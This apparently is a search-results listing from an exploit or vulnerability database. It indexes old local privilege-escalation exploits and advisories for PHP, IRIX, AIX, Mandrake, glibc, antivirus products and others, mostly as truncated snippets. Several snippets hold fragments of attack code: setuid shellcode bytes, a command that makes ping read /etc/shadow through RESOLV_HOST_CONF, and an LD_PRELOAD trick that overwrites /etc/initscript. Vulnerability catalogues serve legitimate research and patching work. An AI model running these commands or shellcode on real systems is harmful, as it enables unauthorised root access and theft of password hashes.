4069 matches found
PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit
No description provided by source. <?php ...
PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit
No description provided by source. <?php // Proof of concept code from the Hardened-PHP...
PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit
No description provided by source. <?php ...
PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit
Exploit for linux platform in category local exploits. PHP <= 4.4.6 / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit. <?php...
KLA10122 SB vulnerability in Comodo Firewall Pro
An unspecified vulnerability was found in Comodo Firewall Pro. By exploiting this vulnerability malicious users can bypass the driver protection for registry keys. This vulnerability can be exploited locally at a point related to OLE NamedPipe. Original advisories - Related products...
Plan 9 Kernel (devenv.c OTRUNC/pwrite) Local Exploit
Exploit for plan9 platform in category local exploits. Plan 9 Kernel (devenv.c OTRUNC/pwrite) Local Exploit. / !!! DO NOT DISTRIBUTE !!! / / identity theft this exploit uses my devenv.c...
McAfee VirusScan for Mac (Virex) <= 7.7 Local Root Exploit
Exploit for macOS platform in category local exploits. McAfee VirusScan for Mac Virex \n\nTargets:\n\n"; foreach $key sortkeys %tgts $a,$b = split/:/,$tgts"$key"; print "\t$key . $a\n"; print "\n"; exit 1; $a,$b = split/:/,$tgts"$target";...
CVE-2007-0670
CVE-2007-0670 affects IBM AIX 5.2 and 5.3, where a buffer overflow in bos.rte.libc can be triggered by the r-commands (rdist, rsh, rcp, rsync, rlogin) to allow local users to execute arbitrary code. Root cause: insufficient bounds checking in bos.rte.libc. Impact: local code execution with partia...
Trend Micro VirusWall 3.81 - 'vscan/VSAPI' Local Buffer Overflow
/ Title: Local root exploit for vscan/VSAPI =Trend Micro VirusWall 3.81 on Linux Author: Sebastian Wolfgarten / [email protected] / http://www.devtarget.org Date: January 3rd, 2007 Severity: Medium Description: The product "InterScan VirusWall 3.81 for Linux" ships a library called...
Microsoft Visual C++ - '.RC Resource Files' Local Buffer Overflow
// // // Microsoft Visual C++ 6.0 SP6 resource compiler buffer overflow // vulnerability .rc resource files exploit // // vulnerability found / exploit built by porkythepig // // include "stdio.h" include "stdlib.h" include "memory.h" define STR01 "Microsoft Visual Studio 6.0 SP6 .rc PoC exploit ...
PT-2006-6799 · Freebsd · Ld.So
Name of the Vulnerable Software and Affected Versions: ld.so in FreeBSD, NetBSD, and possibly other BSD distributions (affected versions not specified). Description: The issue allows local users to gain privileges by passing certain environment variables to loading processes, as ld.so does not remov...
Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit
Exploit for unknown platform in category local exploits. Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit. // AVP...
Resolv+ (RESOLV_HOST_CONF) Linux Library Local Exploit
No description provided by source. setenv RESOLVHOSTCONF /etc/shadow; ping adfas...
Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)
No description provided by source. !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x8...
MS Windows Improper Token Validation Local Exploit (working)
No description provided by source. / Removed include "stdafx.h" / str0ke / include stdio.h include windows.h define INFOBUFFERSIZE MAXCOMPUTERNAMELENGTH + 1 define PATHSIZE INFOBUFFERSIZE + MAXPATH + 4 typedef UINT WINAPI PFnMsiInstallProductLPCSTR szPackagePath, LPCSTR szCommandLine; int mainint...
Qpopper 4.0.x poppassd Local Root Exploit
No description provided by source. / Title: Qpopper v4.0.x poppassd local root exploit. Exploit code: 0x82-Local.Qp0ppa55d.c -- ./0x82-Local.Qp0ppa55d -u x82 -p mypasswd Qpopper v4.0.x poppassd local root exploit. by Xpl017Elz / include stdio.h include stdlib.h include unistd.h include sys/stat.h...
IBM DB2 Universal Database 7.2 (db2licm) Local Exploit
No description provided by source. / Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by Juan Manuel Pascual Escriba pask at uninet.edu / char sc= "\x31\xc0" / begin setuid 0 / "\x31\xdb" "\xb0\x17" "\xcd\x80" "\xeb\x1f" "\x5e" "\x89\x76\x08" "\x31\xc0" "\x88\x46\x07"...
IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit
No description provided by source. !/bin/sh copyright LAST STAGE OF DELIRIUM jul 2000 poland ://lsd-pl.net/ /usr/lib/print/netprint This code gets released due to another post to the Bugtraq mailing list. For IRIX 6.3 and above this privilege escalation attack can be conducted by local lp users...
IRIX /bin/login Local Buffer Overflow Exploit
No description provided by source. / /bin/login exploit by DCRH 24/5/97 Tested on: R3000 Indigo Irix 5.3 R4400 Indy Irix 5.3 R5000 O2 Irix 6.3 R8000 Power Challenge Irix 6.2 Compile as: cc -n32 login.c for Irix 6.x cc login.c for Irix 5.x Press enter when prompted for a password / include stdio.h...
GLIBC 2.1.3 ld_preload Local Exploit
No description provided by source. !/bin/tcsh example of exploiting the hole in LDPRELOAD shadow tested on redhat 6.0, should work on others if -e /etc/initscript echo uwaga: /etc/initscript istnieje cd /lib umask 0 setenv LDPRELOAD libSegFault.so setenv SEGFAULTOUTPUTNAME /etc/initscript echo...